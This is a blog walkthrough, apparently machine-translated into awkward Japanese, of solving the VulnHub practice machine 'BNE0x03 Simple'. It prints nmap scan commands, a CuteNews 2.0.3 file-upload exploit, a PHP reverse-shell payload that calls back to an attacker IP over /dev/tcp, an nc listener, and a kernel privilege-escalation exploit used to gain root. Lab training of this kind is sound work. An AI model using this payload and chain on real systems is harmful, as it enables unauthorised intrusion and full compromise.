目次
初めに書く
このブログは、兄貴の赤チームのメモのビデオに基づいています。銃撃戦の思考のすべてのステップが詳しく説明されています。記事の再現ではありません。読者は辛抱強く見れば何かを得ることができます。ターゲットドローンは非常にシンプルですが、標準的な攻撃チェーンを備えたターゲットドローンです。この記事の撮影プロセスには、cms の脆弱性、ファイル アップロードの脆弱性、カーネル権限昇格などの悪用が含まれています。完全なターゲティングのアイデアをご覧ください。
「レッドチームノート」ターゲットドローン集中講義:BNE0x03Simple - カーネル権限昇格で考慮すべきことは何ですか? こうしたジレンマに遭遇したことはありますか? どのように対処しましたか? _哔哩哔哩_bilibili この記事で対象とするドローンは、vulnhub からのものです。
SecTalks: BNE0x03 - シンプル ~ VulnHub
ターゲット マシンのダウンロード リンクについては、次を参照してください。
https://download.vulnhub.com/sectalks/Simple.ova
このターゲット マシンの目的は、root 権限を取得して /root/flag.txt を読み取ることです。ダウンロードが成功したら、vmware で開き、ネットワーク アダプターを NAT モードに設定します。図に示すように、ターゲット マシンを開いた後、次のようになります。
ステップ 1: ホストの検出とポート スキャン
従来の考え方では、ポート 80 のみが開いていることがわかりました。詳しく話すのがめんどくさいんです。
nmap -sn 10.10.10.0/24
nmap --min-rate 10000 -p- 10.10.10.138
nmap -sT -sV -O -sC -p80 10.10.10.138
nmap -sU --min-rate 10000 -p- 10.10.10.138
nmap --script=vuln -p80 10.10.10.138
ステップ 2: Web への浸透
ブラウザはターゲット マシンの IP にアクセスし、それがログイン インターフェイスであることを確認します。
ログインできれば、より有益な情報を入手できるはずです。ログイン ボックスを見つけるための一般的なアイデア:弱いパスワード/デフォルト パスワード/インジェクション/関連する脆弱性の検索、またはその他の情報の検索/ブラスト。ここでは cms とそのバージョンが CuteNews2.0.3 として表示されているので、最初にそれを検索するとよいでしょう。
searchsploit CuteNews 2.0.3
任意のファイルによってアップロードされた脆弱性エクスプロイト ファイルが正常に見つかりました。ファイルをアップロードできる場合は、リバース シェル ペイロードをアップロードし、実行をトリガーしてシェルを取得できます。まず、この 37474.txt をダウンロードします。
searchsploit -m 37474
この 37474.txt を確認してください。
これは、脆弱性悪用のプロセス全体を大まかに説明しています。つまり、アカウントを登録し、ログイン後に個人オプションにアクセスして、shell.php をアップロードします。パス /cutenews/uploads/ ディレクトリでアップロードしたシェルを見つけて、実行をトリガーできます。
ステップ 3: ファイルをアップロードしてシェルを取得する
次に、エクスプロイト ファイル内のプロンプトに従い、段階的に実行します。まず Web インターフェイスに戻ってアカウントを登録し ([登録] をクリック)、次のページに移動します。
アカウントを登録し、「登録」をクリックして、インターフェースに直接ログインするだけです。
[個人] オプションをクリックします。
このインターフェースにはファイルのアップロード場所があることがわかります。シェルを再度直接アップロードします。コンテンツは php のリバウンドシェルです。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'"); ?>
実際に、uploads/ ディレクトリにアップロードしたシェルが表示されます。
nc を開いてポート 1234 をリッスンします。
nc -lvnp 1234 
avater_a_shell.php のパスをクリックして、リバウンド シェルを直接トリガーします。
ステップ 4: カーネル権限の昇格
まず、sudo -l で権限をチェックし、tty がないことがわかり、Python を使用してより対話性の高いシェルを作成しますが、sudo -l ではパスワードを入力する必要があり、このパスはブロックされていることがわかります。
ポート 80 のみが開いているため、機密情報を検索する意味は非常に小さいです (ssh は使用できません)。このシェルを使用して抽出し、スケジュールされたタスクを確認する必要がありますが、得るものは何もありません
これを確認した後は、カーネルの抽出を試行するしかありません。最初にカーネルのバージョンを確認します。
uname -a
Linux シンプル 3.16.0-30-汎用 #40~14.04.1-Ubuntu
対応するバージョンの抽出の脆弱性を再度検索してみましょう。
searchsploit kernel 3.16.0-generic |grep "Privilege Escalation"
ここには多くのトリックはなく、最も一致するバージョンを持つエクスプロイト ファイルのみを可能な限り選択できます。ubuntu 14.04 システムの権限昇格の脆弱性を選択するのが最善です。何度か試しても適切なものが見つからなかったので、Ubuntu 14.04 で再度検索しました。
searchsploit Ubuntu 14.04 |grep "Privilege Escalation" 
最初のスクリプトから試してみてください。たまたま、最初のスクリプトが権限を昇格できるスクリプトであるだけです。37088.c をダウンロードした後、このファイルを確認してください。
特別なコンパイル方法はなく、gcc を直接実行するだけです。ここで名前も変更し、37088.c を apport-race.c に名前変更しました。
mv 37088.c apport-race.c次に、ポートを開始して http サービスを開始し、ここで php を使用します。
次に、ターゲット マシンの /tmp ディレクトリに入り、特権昇格ファイル apport-race.c を kali からダウンロードします。
ダウンロードが成功しました:
次に、コンパイルして権限の昇格を許可します。
gcc apport-race.c -o apport-race
./apport-race
ここで赤チームノートボスは36746を使用します。カーネル権限昇格エクスプロイト スクリプトが複数存在するはずです。ただし、彼が searchspoit で検索するキーワードは apport であり、少しわかりにくいと思います。
最後に、/root ディレクトリに入ってフラグを見つけます。
これでターゲティングは完了です。
まとめと考察
このターゲット マシンは比較的単純です。つまり、cms の脆弱性を悪用し、シェルをアップロードしてリバウンド シェルをトリガーし、カーネル権限を昇格します。しかし、これは典型的な攻撃チェーンの 1 つです。cms の脆弱性を悪用したファイル 37474 は非常に完璧なヒントを提供してくれたので、ターゲット マシンの難易度はさらに軽減されました。このファイルがなくても、cms にログインしてファイルがアップロードされた場所を見つける方法を見つける必要があります。アップロードされたファイルの保存場所については、ディレクトリブラスティングを通じて見つけることもできます。最後に、ターゲティングのアイデアをまとめます。
1. ホスト検出とポート スキャン: ポート 80 のみが開いています。
2. Web 侵入: ターゲット マシンの IP がログイン インターフェイスであり、cms が CuteCMS 2.0.3 であることがわかります。この cms を検索してエクスプロイト ファイルを見つけます。
3. ファイルをアップロードしてシェルを取得します。CMS エクスプロイト ファイルを段階的に実行し、最終的にシェルを正常にアップロードし、コードの実行をトリガーしてリバウンド シェルを取得します。
4. カーネル権限の昇格: ポート 80 のみが開いているため、現在のシェルを通じてのみ権限を昇格できます。現在のユーザーの権限とスケジュールされたタスクをチェックしても効果がなかった後、カーネル権限が引き上げられました。複数のスクリプトを試した結果、最終的に 37088 が権限を正常に昇格できることがわかりました。
ここで対象となるマシンについて説明します。対象のドローンは難しくなく、簡単にまとめることができませんが、私自身の考えもたくさんありますので、読者の皆様に「いいね」と「フォロー」をたくさんしていただければ幸いです!読者が撮影について質問がある場合は、コメント欄にメッセージを残して指摘してください。私はすべて知っています。